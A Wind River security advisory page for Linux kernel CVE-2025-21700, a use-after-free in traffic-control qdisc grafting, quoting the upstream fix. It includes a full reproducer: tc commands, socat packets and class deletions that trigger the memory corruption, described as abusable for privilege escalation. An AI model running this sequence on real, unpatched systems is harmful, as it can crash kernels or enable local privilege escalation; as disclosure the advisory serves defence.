Wind River Support Network

HomeDefectsLIN1021-13448
Acknowledged

LIN1021-13448 : Security Advisory - linux - CVE-2025-21700

Created: Feb 13, 2025    Updated: Jun 17, 2025
Found In Version: 10.21.20.1
Severity: Standard
Applicable for: Wind River Linux LTS 21
Component/s: Kernel

Description

In the Linux kernel, the following vulnerability has been resolved:net: sched: Disallow replacing of child qdisc from one parent to anotherLion Ackermann was able to create a UAF which can be abused for privilegeescalation with the following scriptStep 1. create root qdisctc qdisc add dev lo root handle 1:0 drrstep2. a class for packet aggregation do demonstrate uaftc class add dev lo classid 1:1 drrstep3. a class for nestingtc class add dev lo classid 1:2 drrstep4. a class to graft qdisc totc class add dev lo classid 1:3 drrstep5.tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024step6.tc qdisc add dev lo parent 1:2 handle 3:0 drrstep7.tc class add dev lo classid 3:1 drrstep 8.tc qdisc add dev lo parent 3:1 handle 4:0 pfifostep 9. Display the class/qdisc layouttc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kbtc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2step10. trigger the bug <=== prevented by this patchtc qdisc replace dev lo parent 1:3 handle 4:0step 11. Redisplay again the qdiscs/classestc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kbtc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent 1:2Observe that a) parent for 4:0 does not change despite the replace request.There can only be one parent.  b) refcount has gone up by two for 4:0 andc) both class 1:3 and 3:1 are pointing to it.Step 12.  send one packet to plugecho "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))step13.  send one packet to the grafted fifoecho "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))step14. lets trigger the uaftc class delete dev lo classid 1:3tc class delete dev lo classid 1:1The semantics of "replace" is for a del/add _on the same node_ and nota delete from one node(3:1) and add to another node (1:3) as in step10.While we could "fix" with a more complex approach there could beconsequences to expectations so the patch takes the preventive approach of"disallow such config".Joint work with Lion Ackermann <nnamrec@gmail.com>


CREATE(Triage):(User=admin) CVE-2025-21700 (https://nvd.nist.gov/vuln/detail/CVE-2025-21700)
Live chat
Online
  • Linkedin
  • Facebook
  • Twitter
  • Youtube